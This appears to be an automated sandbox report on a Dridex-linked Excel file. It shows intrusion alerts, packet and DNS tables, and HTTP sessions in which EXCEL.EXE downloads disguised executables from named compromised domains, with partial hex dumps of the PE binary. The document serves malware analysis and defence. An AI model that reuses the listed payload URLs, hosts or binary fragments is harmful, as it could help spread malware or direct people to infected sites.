                                                                                01/20/21-16:15:32.001463TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649314198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.001463TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649314198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.040879TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)535349311211.110.44.63192.168.2.22
                                                                                01/20/21-16:15:32.077993TCP2023476ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22
                                                                                01/20/21-16:15:32.077993TCP2022535ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)378649315198.57.200.100192.168.2.22

Network Port Distribution

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2021 16:13:16.189310074 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.346859932 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.346925020 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.347480059 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.504955053 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.509875059 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.509907961 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.509926081 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.509943008 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.509980917 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510015965 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510040998 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510061979 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510082006 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510194063 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.510210991 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.510323048 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.510387897 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.515320063 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667687893 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667726994 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667747974 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667752028 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667768955 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667778969 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667789936 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667799950 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667817116 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667819977 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667839050 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667840004 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667855978 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667865992 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667872906 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667891026 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667907000 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667915106 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667926073 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667937040 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667954922 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667963982 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667972088 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.667988062 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.667998075 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668009043 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668020010 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668030977 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668046951 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668056011 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668064117 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668077946 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668092966 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668098927 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668123007 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668148041 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668406010 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668432951 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.668468952 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.668493986 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.669162035 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.825963974 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826013088 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826040983 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826065063 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826159000 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826308012 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826348066 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826368093 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826370955 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826414108 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826446056 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826467991 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826488018 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826488972 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826525927 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826541901 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826565027 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826565027 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826613903 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826618910 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826638937 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826662064 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826664925 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826689005 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826694012 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826708078 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826719046 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826730013 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826741934 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826751947 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826765060 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826773882 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826787949 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826807022 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826809883 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826828957 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826833963 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826850891 CET | 49165 | 80 | 192.168.2.22 | 192.185.147.185
Jan 20, 2021 16:13:16.826855898 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22
Jan 20, 2021 16:13:16.826880932 CET | 80 | 49165 | 192.185.147.185 | 192.168.2.22

UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 20, 2021 16:13:16.112600088 CET | 52197 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:13:16.160547018 CET | 53 | 52197 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:13:23.137412071 CET | 53099 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:13:23.556890965 CET | 53 | 53099 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:13:26.432528019 CET | 52838 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:13:26.541686058 CET | 53 | 52838 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:13:28.072592974 CET | 61200 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:13:28.130048990 CET | 53 | 61200 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:13:30.252094984 CET | 49548 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:13:30.332861900 CET | 53 | 49548 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:14:24.282042027 CET | 55627 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:14:24.340492964 CET | 53 | 55627 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:14:24.349452019 CET | 56009 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:14:24.409580946 CET | 53 | 56009 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:14:29.059999943 CET | 61865 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:14:29.116596937 CET | 53 | 61865 | 8.8.8.8 | 192.168.2.22
Jan 20, 2021 16:14:31.766627073 CET | 55171 | 53 | 192.168.2.22 | 8.8.8.8
Jan 20, 2021 16:14:31.875066042 CET | 53 | 55171 | 8.8.8.8 | 192.168.2.22

DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jan 20, 2021 16:13:16.112600088 CET | 192.168.2.22 | 8.8.8.8 | 0xccae | Standard query (0) | monitrade.net | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:23.137412071 CET | 192.168.2.22 | 8.8.8.8 | 0x3dfe | Standard query (0) | bafnabrotherskesarwala.com | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:26.432528019 CET | 192.168.2.22 | 8.8.8.8 | 0x315e | Standard query (0) | artec.com.tr | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:28.072592974 CET | 192.168.2.22 | 8.8.8.8 | 0xa4ce | Standard query (0) | www.gastronauts.asia | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:30.252094984 CET | 192.168.2.22 | 8.8.8.8 | 0x7e45 | Standard query (0) | laureys.be | A (IP address) | IN (0x0001)
Jan 20, 2021 16:14:29.059999943 CET | 192.168.2.22 | 8.8.8.8 | 0x6029 | Standard query (0) | cms.ivpr.org | A (IP address) | IN (0x0001)
Jan 20, 2021 16:14:31.766627073 CET | 192.168.2.22 | 8.8.8.8 | 0x762a | Standard query (0) | salaodigitalautomovel.pt.deve.pt | A (IP address) | IN (0x0001)

DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jan 20, 2021 16:13:16.160547018 CET | 8.8.8.8 | 192.168.2.22 | 0xccae | No error (0) | monitrade.net | - | 192.185.147.185 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:23.556890965 CET | 8.8.8.8 | 192.168.2.22 | 0x3dfe | No error (0) | bafnabrotherskesarwala.com | - | 103.11.153.223 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:26.541686058 CET | 8.8.8.8 | 192.168.2.22 | 0x315e | No error (0) | artec.com.tr | - | 46.28.239.13 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:28.130048990 CET | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | www.gastronauts.asia | gastronauts.asia | - | CNAME (Canonical name) | IN (0x0001)
Jan 20, 2021 16:13:28.130048990 CET | 8.8.8.8 | 192.168.2.22 | 0xa4ce | No error (0) | gastronauts.asia | - | 132.148.96.144 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:13:30.332861900 CET | 8.8.8.8 | 192.168.2.22 | 0x7e45 | No error (0) | laureys.be | - | 85.17.252.207 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:14:29.116596937 CET | 8.8.8.8 | 192.168.2.22 | 0x6029 | No error (0) | cms.ivpr.org | - | 64.37.52.138 | A (IP address) | IN (0x0001)
Jan 20, 2021 16:14:31.875066042 CET | 8.8.8.8 | 192.168.2.22 | 0x762a | No error (0) | salaodigitalautomovel.pt.deve.pt | - | 185.32.190.115 | A (IP address) | IN (0x0001)

HTTP Request Dependency Graph

• monitrade.net
• bafnabrotherskesarwala.com
• artec.com.tr
• www.gastronauts.asia
• laureys.be
• cms.ivpr.org
• salaodigitalautomovel.pt.deve.pt

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49165 | 192.185.147.185 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Timestamp | kBytes transferred | Direction | Data
Jan 20, 2021 16:13:16.347480059 CET | 0 | OUT | GET /h79fwesfe.rar HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: monitrade.net
Connection: Keep-Alive
Jan 20, 2021 16:13:16.509875059 CET | 2 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Jan 2021 15:13:16 GMT
Server: Apache
Upgrade: h2,h2c
Connection: Upgrade, Keep-Alive
Last-Modified: Tue, 12 Jan 2021 11:40:23 GMT
Accept-Ranges: bytes
Content-Length: 765440
Keep-Alive: timeout=5, max=75
Content-Type: application/x-rar-compressed
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 
00 8c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 e8 1a 00 00 00 90 0c 00 00 1c 00 00 00 92 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a1 fa 01 10 c3 fa 01 10 b7 fa 01 10 89 fa 01 10 95 fa 01 10 50
                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$15Q!uT?ruT?ruT?rrtT?rxrwT?rxrtT?rxrzT?rxrwT?rrvT?ruT>r<T?rxrtT?rxrzT?rxrtT?rxrtT?rRichuT?rPELR!do@`rM\q<`8(@p\.textbd `.datah@.idata p@@.rsrc@@.reloc@BP


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                1 | 192.168.2.22 | 49166 | 103.11.153.223 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:13:23.737931967 CET | 809 | OUT | GET /ys95lm6k.rar HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: bafnabrotherskesarwala.com
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:23.911391973 CET | 810 | IN | HTTP/1.1 404 Not Found
                                                                                Date: Wed, 20 Jan 2021 15:13:21 GMT
                                                                                Server: Apache
                                                                                Content-Length: 315
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                2 | 192.168.2.22 | 49167 | 46.28.239.13 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                Timestamp | kBytes transferred | Direction | Data
                                                                                Jan 20, 2021 16:13:26.615818024 CET | 810 | OUT | GET /xkpffwn.zip HTTP/1.1
                                                                                Accept: */*
                                                                                UA-CPU: AMD64
                                                                                Accept-Encoding: gzip, deflate
                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                Host: artec.com.tr
                                                                                Connection: Keep-Alive
                                                                                Jan 20, 2021 16:13:26.689331055 CET | 812 | IN | HTTP/1.1 200 OK
                                                                                Date: Wed, 20 Jan 2021 15:13:25 GMT
                                                                                Server: Apache
                                                                                Last-Modified: Mon, 11 Jan 2021 21:14:58 GMT
                                                                                Accept-Ranges: bytes
                                                                                Content-Length: 765440
                                                                                Keep-Alive: timeout=5, max=100
                                                                                Connection: Keep-Alive
                                                                                Content-Type: application/zip
                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 31 35 51 21 75 54 3f 72 75 54 3f 72 75 54 3f 72 a8 ab f1 72 74 54 3f 72 78 06 e2 72 77 54 3f 72 78 06 e0 72 74 54 3f 72 78 06 df 72 7a 54 3f 72 78 06 de 72 77 54 3f 72 a8 ab f4 72 76 54 3f 72 75 54 3e 72 3c 54 3f 72 78 06 e3 72 74 54 3f 72 78 06 da 72 7a 54 3f 72 78 06 e4 72 74 54 3f 72 78 06 e1 72 74 54 3f 72 52 69 63 68 75 54 3f 72 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 15 df dc 52 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0c 00 00 64 0b 00 00 16 01 00 00 00 00 00 98 6f 0a 00 00 10 00 00 00 80 0b 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 0c 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 60 72 0b 00 4d 00 00 00 5c 71 0c 00 3c 00 00 00 00 80 0c 00 10 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 0c 00 e8 1a 00 00 60 10 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 f4 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 0c 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ad 62 0b 00 00 10 00 00 00 64 0b 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c8 e8 00 00 00 80 0b 00 00 1a 00 00 00 68 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 20 09 00 00 00 70 0c 00 00 0a 00 00 00 82 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 10 05 00 00 00 80 0c 00 00 06 00 00 
